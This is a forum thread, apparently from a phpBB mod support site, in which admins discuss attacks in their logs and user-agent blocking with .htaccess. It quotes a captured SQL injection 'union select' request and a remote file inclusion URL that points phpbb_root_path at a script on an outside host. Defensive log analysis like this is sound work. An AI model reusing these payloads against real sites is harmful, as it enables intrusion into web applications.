IntegraMOD

We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...

using rewrite, it kills the tool that is hitting me in about 85% of the attacks. This makes the log smaller so if you try it, set it up to process the rewrite first then the url's it could help speed things up a bit (this file is processed on every request I believe) and make a little less work with the logs for you.

Just a thought.

Checking the log file I found this little number:

Code: Select all

/forum/links.php?t=search&search_keywords=asd&start=1,1+and+1=2+union+select+0x2D4578372D31,0x2D4578372D32,0x2D4578372D33,0x2D4578372D34,0x2D4578372D35,0x2D4578372D36,0x2D4578372D37,0x2D4578372D38,0x2D4578372D39,0x2D4578372D3130,0x2D4578372D3131,0x2D4578372D3132,0x2D4578372D3133,0x2D4578372D3134,0x2D4578372D3135,0x2D4578372D3136,0x2D4578372D3137,0x2D4578372D3138,0x2D4578372D3139,0x2D4578372D3230,0x2D4578372D3231,0x2D4578372D3232,0x2D4578372D3233,0x2D4578372D3234,0x2D4578372D3235,0x2D4578372D3236,0x2D4578372D3237,0x2D4578372D3238,0x2D4578372D3239,0x2D4578372D3330,0x2D4578372D3331,0x2D4578372D3332,0x2D4578372D3333,0x2D4578372D3334,0x2D4578372D3335,0x2D4578372D3336,0x2D4578372D3337,0x2D4578372D3338,0x2D4578372D3339,0x2D4578372D3430,0x2D4578372D3431,0x2D4578372D3432,0x2D4578372D3433,0x2D4578372D3434,0x2D4578372D3435,0x2D4578372D3436,0x2D4578372D3437,0x2D4578372D3438,0x2D4578372D3439,0x2D4578372D3530/*

What the heck is it?

Btw, what is that Rewrite in .htaccess? Can it be used for attacks like what I posted above?

post the full attack like this:

forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm

and If i have a .htaccess rule I'll post it, the attack type is in that url "union+select".

I tried the RewriteCond code you supplied and I get 403 Access Denied. It was a direct copy and paste.

*Edit*: I found the problem, the [OR] can only be used when there is going to be another command (possibly of a similar type).

Code: Select all

 RewriteEngine On# testing user agent blockingRewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]RewriteCond %{HTTP_USER_AGENT} ai_archiver# end testRewriteRule ^.* - [F,L]

Thats correct, did you check to see if that block will stop that?

I've been watching and the logs have been clean. Whats totally nuts is I actually want to see an entry now, just so I can block it. Thanks for that bit of code. With the error, inadvertent as it was, I researched .htaccess commands and found ways to further secure my site. Specifically hiding the .htaccess file from external requests. I never knew all the good things that could be done in .htaccess, it is a pretty powerful file.